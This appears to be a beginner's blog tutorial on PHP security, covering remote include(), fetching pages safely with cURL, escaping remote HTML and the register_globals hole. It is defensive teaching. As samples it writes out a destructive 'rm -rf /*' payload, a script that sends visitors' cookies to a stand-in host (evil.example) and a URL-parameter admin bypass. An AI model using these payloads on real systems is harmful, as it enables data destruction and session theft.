Intro
If you've watched any TV in the U.S. lately, you've probably seen a commercial where nice, friendly folks are saying things like "I want my computer to be infected by viruses.", "I want all of my family photos to disappear without a trace." or "I want my laptop to sound like a Yeti."
Naturally, none of these folks honestly want that sort of pain, but by not taking steps to protect themselves, they're letting in bad guys. Understand that, like your home, car, or personal savings account, you can't just leave it wide open and trust in the kindness of strangers. Sadly, most strangers aren't really as nice as you'd hope. In fact, this probably explains why banks switched off keeping their money in a big bag out in the middle of an empty field after the first few days.
Still, it's easy to make mistakes if nobody ever tells you what the right answer is. Ignorance isn't bad. Willful ignorance is, but since you're reading this I'll presume you're not that stupid.
Here's a rundown of what not to do and why.
<?php include('http://example.com'); ?>
This is delicious, candy covered evil. What it means is "Go to http://example.com, fetch the contents, and then run them just as if I were telling you to do it."
That's fine for something like the following:
<b>Hello World</b>
but not so fine if the site gets hacked (or the owner gets pissed at you) and it's replaced with:
Evil ruuLzzzzorz!!! <?php system("rm -rf /*"); ?>
which will delete ("remove") everything on your server that the web server's user is allowed to delete, which on a lot of shared hosts means your entire site. (PHP 5.2 and later refuse to include() from a URL unless allow_url_include is switched on, and it's off by default. Leave it off. The lesson still stands for anything that turns remote data into code.)
<?php print file_get_contents('http://example.com'); ?>
This is a little safer, since all it does is read the contents of a remote page and print them. There's no chance that someone could insert bad PHP code into this and have it execute, but whatever HTML comes back is dropped straight into your page, so someone could inject bad JavaScript, and suddenly your site is infesting your visitors with millions of pop-up ads (or quietly shipping their cookies for your site off to somebody else, since that script runs as if it were yours). That will make them say very naughty things about you.
There are lots of other things, but those are the "biggies".
PHP has a very powerful library of calls for fetching data from remote sites without executing any of it. It's called cURL (the curl_* functions). Now, don't let that big page of really confusing crap scare you, it's actually pretty simple.
Here's a quick cURL replacement for the fetch-and-print one-liner above:
<?php
$curl_handle=curl_init();                                    // start a new transfer
curl_setopt($curl_handle,CURLOPT_URL,'http://example.com');  // what to fetch
curl_exec($curl_handle);                                     // fetch it; without CURLOPT_RETURNTRANSFER the body is printed straight out
curl_close($curl_handle);                                    // tidy up
?>
That's it, and if you really wanted, the last curl_close() step is optional.
Mind you, your visitors are still exposed to whatever evil JavaScript and cookie-stealing crap the remote site sends, because you're printing its HTML as part of your own page. Filtering that out properly involves more work than you probably want to do. If you do want to do it, I'd suggest brushing up on Regular Expressions and preg_replace(), with one warning: regex is a lousy way to strip tags (there are more ways to spell <script> than you'll think of), so if all you need is the remote text, run it through htmlspecialchars() and be done with it.
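As an added example (not code from the original post), here is what to do with a remote page once you have it as a string, say from curl with CURLOPT_RETURNTRANSFER. The "remote" response is a constructed string so the snippet runs offline, and the render_* function names are invented for this illustration. It goes a little beyond the paragraph by also showing strip_tags() with an allow-list as the less fragile alternative to a home-grown preg_replace().

```php
<?php
// Added example, not code from the original post. Shows what to do with a
// remote page once you have it as a string (e.g. from curl with
// CURLOPT_RETURNTRANSFER). The "remote" body is constructed here so this
// runs offline; the render_* names are invented for illustration.
$remote_body = '<b>Hello World</b>'
    . '<script>document.location="http://evil.example/?c=" + document.cookie</script>'
    . '<img src="x" onerror="alert(1)">';

// Unsafe: whatever example.com sends runs in your visitors' browsers, under
// your site's origin, with your site's cookies. This is the cookie-stealing
// problem the text warns about.
function render_unsafe(string $html): string
{
    return $html;
}

// Safe when you only need the remote *text*: every < > & " ' becomes an
// entity, so the browser displays "<script>" instead of running it.
function render_as_text(string $html): string
{
    return htmlspecialchars($html, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// If you want to keep a little markup, strip_tags() with a short allow-list
// beats a home-grown preg_replace(). Disallowed tags are removed outright
// (the <img onerror=...> is gone) but the text between the <script> tags
// stays behind as harmless text. strip_tags() does NOT strip attributes
// from the tags you allow, so keep the list to tags with no dangerous
// attributes: allowing <a> would let href="javascript:..." through.
function render_limited_markup(string $html): string
{
    return strip_tags($html, '<b><i><p><br>');
}

print "Unsafe (do not do this):\n" . render_unsafe($remote_body) . "\n\n";
print "Escaped as text:\n" . render_as_text($remote_body) . "\n\n";
print "Tag allow-list:\n" . render_limited_markup($remote_body) . "\n";
```

If you need to keep real, rich HTML from a site you don't control, neither of these is enough; that is a job for a proper HTML sanitizer library, not a regex.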
But let's really use CURL for what it can do. Let's say that example.com isn't really that reliable. It bugs you that whenever they're down, your page takes 30 seconds to load. Well, there's a solution to that:
<?php
$curl_handle=curl_init();
curl_setopt($curl_handle,CURLOPT_URL,'http://example.com');
curl_setopt($curl_handle,CURLOPT_CONNECTTIMEOUT,2);
curl_exec($curl_handle);
curl_close($curl_handle);
?>
What that says is to give up if it can't even connect within two seconds. Heck, you may want to set it to 1 second to make your page load even zippier. Two caveats, though. CURLOPT_CONNECTTIMEOUT only covers getting the connection open, so a server that answers and then dribbles the page out one byte at a time can still stall you; CURLOPT_TIMEOUT (a limit on the whole transfer) is the fix for that. And be careful not to set it to zero. That doesn't mean "instant", it means curl's built-in default, which is a leisurely 300 seconds.
But what if we also want to display a message if you don't get anything back? Ha-ha! That's easy!
<?php
$curl_handle=curl_init();
curl_setopt($curl_handle,CURLOPT_URL,'http://example.com');
curl_setopt($curl_handle,CURLOPT_CONNECTTIMEOUT,2);
curl_setopt($curl_handle,CURLOPT_RETURNTRANSFER,1);   // hand the body back as a string instead of printing it
$buffer = curl_exec($curl_handle);                     // false if the fetch failed, otherwise the body (possibly "")
curl_close($curl_handle);
if ($buffer === false || $buffer === '')               // don't use empty(): a page whose whole body is "0" would count as a failure
{
print "Sorry, example.com are a bunch of poopy-heads.<p>";
}
else
{
print $buffer;
}
?>
Are you starting to see the power of CURL?
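Pulling the pieces above together as an added example (not the original post's code): fetch_remote() is a hypothetical helper that returns null on any failure instead of trusting empty(), caps both the connect time and the whole transfer, checks the HTTP status, and refuses anything but http/https. Run with no network it simply takes the failure path and prints the apology, which is the behaviour you want.

```php
<?php
// Added example, not code from the original post. fetch_remote() is a
// hypothetical helper wrapping the curl calls discussed above.
function fetch_remote(string $url): ?string
{
    $ch = curl_init();
    curl_setopt_array($ch, [
        CURLOPT_URL            => $url,
        CURLOPT_RETURNTRANSFER => true,   // give the body back, don't print it
        CURLOPT_CONNECTTIMEOUT => 2,      // connect phase only
        CURLOPT_TIMEOUT        => 5,      // whole transfer: a slow trickle can't stall your page
        CURLOPT_FOLLOWLOCATION => false,  // don't let them redirect you somewhere you didn't ask for
        CURLOPT_PROTOCOLS      => CURLPROTO_HTTP | CURLPROTO_HTTPS, // no file://, ftp://, gopher://...
        CURLOPT_MAXFILESIZE    => 1024 * 1024, // don't buffer a gigabyte because they sent one
                                               // (older libcurl only checks this against Content-Length)
    ]);

    $body = curl_exec($ch);
    $err  = curl_errno($ch);
    $code = (int) curl_getinfo($ch, CURLINFO_HTTP_CODE);
    curl_close($ch);

    // curl_exec() returns false on a transport error. "" is a legitimate
    // empty body and "0" is a legitimate body that empty() would throw away,
    // so test for false explicitly.
    if ($body === false || $err !== 0) {
        return null;
    }
    // A 404 or 500 page is still a successful transfer as far as curl is
    // concerned, but it is not the content you wanted to show.
    if ($code !== 200) {
        return null;
    }
    return $body;
}

$buffer = fetch_remote('http://example.com');
if ($buffer === null) {
    print "Sorry, example.com are a bunch of poopy-heads.<p>";
} else {
    // It is still somebody else's HTML: escape it (or sanitize it) before printing.
    print htmlspecialchars($buffer, ENT_QUOTES, 'UTF-8');
}
```

The status check matters more than it looks: without it, example.com's "down for maintenance" page, or a hosting company's 404 page full of ads, gets printed into your site as if it were the content you asked for.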
Well, first off, I'd make sure I have the latest copy of WordPress, phpBB, and any other package I've already installed. If you're also a Dreamhost type person, you can take advantage of them being the best damn hosting company on the internet and use their spiffy one-click installs to get the latest version.
I'd then recommend reading up on PHP over at php.net. Each of the help pages has comments and examples of how to use it. It's very helpful. Generally, it's a good idea to know what you're running. Like reading your car's owner's manual before you're stuck on the side of the freeway wondering where the heck the jack is.
I'd also add the following to my .htaccess file. (This should be at the top directory for your website, in the same directory as your very top page.) Files with periods at the front of them are hidden on most systems, so you may have to turn on "Show Hidden Files" in your FTP client.
php_flag register_globals off
This will prevent PHP from automagically turning any value in the URL into a variable. That's a good thing because it means Evil Hacker People can't insert anything they like into your code simply by sticking it into your URL. The classic victim is a script that does something like if ($authorized) { show_the_admin_page(); } and only ever sets $authorized on the login-success path; with register_globals on, tacking ?authorized=1 onto the URL sets it for the attacker. The problem with turning it off is that it breaks some packages, notably ones like ATP and phpNuke. There are safer, better versions out there, you just have to go get them, learn them and keep them up-to-date. Two more things to know: php_flag and php_value in .htaccess only work when PHP runs as an Apache module (under CGI or FastCGI, Apache doesn't know the directive and throws a 500 error, and the setting belongs in php.ini instead), and register_globals was removed altogether in PHP 5.4, so on any current PHP you get this fix for free.
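Here is the shape of the bug as an added example (not from the original post). register_globals is gone from PHP 5.4 onward, so the snippet simulates it with extract() on the request array, which does exactly what register_globals did for every request and is a mistake people still write by hand. The request array is constructed to stand for an attacker's URL, and the function and variable names are invented for illustration.

```php
<?php
// Added example, not code from the original post. extract($request) stands
// in for register_globals: it turns every request parameter into a local
// variable, which is the whole problem.

// Constructed attacker request: the equivalent of visiting page.php?is_admin=1
$attacker_request = ['is_admin' => '1'];

// Vulnerable: $is_admin is only assigned on the success path, so whatever
// the attacker put in the URL is still sitting in it for everyone else.
// (extract() would also happily overwrite $logged_in_user if the attacker
// passed one, which is the same bug from another angle.)
function vulnerable_check(array $request, ?string $logged_in_user): bool
{
    extract($request);                 // what register_globals did to every script
    if ($logged_in_user === 'alice') {
        $is_admin = true;
    }
    return !empty($is_admin);          // attacker's "1" survives to here
}

// Fixed: initialise every decision variable yourself and never let request
// data name your variables. Read input explicitly from $_GET / $_POST (here,
// from $request) only where you actually mean to take input, and treat it
// as data, never as the decision.
function fixed_check(array $request, ?string $logged_in_user): bool
{
    $is_admin = false;                 // never trust a variable you didn't set
    if ($logged_in_user === 'alice') {
        $is_admin = true;
    }
    return $is_admin;
}

// Neither caller is logged in.
var_dump(vulnerable_check($attacker_request, null));
var_dump(fixed_check($attacker_request, null));
```

The vulnerable version lets the anonymous request through as admin while the fixed version does not, and the only difference is that the fixed one assigns $is_admin before anything else can. Setting register_globals off (or running PHP 5.4+) removes the automatic version of this; code that calls extract() on request data reintroduces it by hand.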
There, now hopefully you understand and have some work-around fixes.
The proprietor of tellinya.com points out that he has a few more advanced usages and classes you might be interested in. I've not tested his code out, and he seems to set a lot of variables to their default values, but the code is fairly straightforward and shows you what you can do with cURL.
And most of all... Let's be careful out there.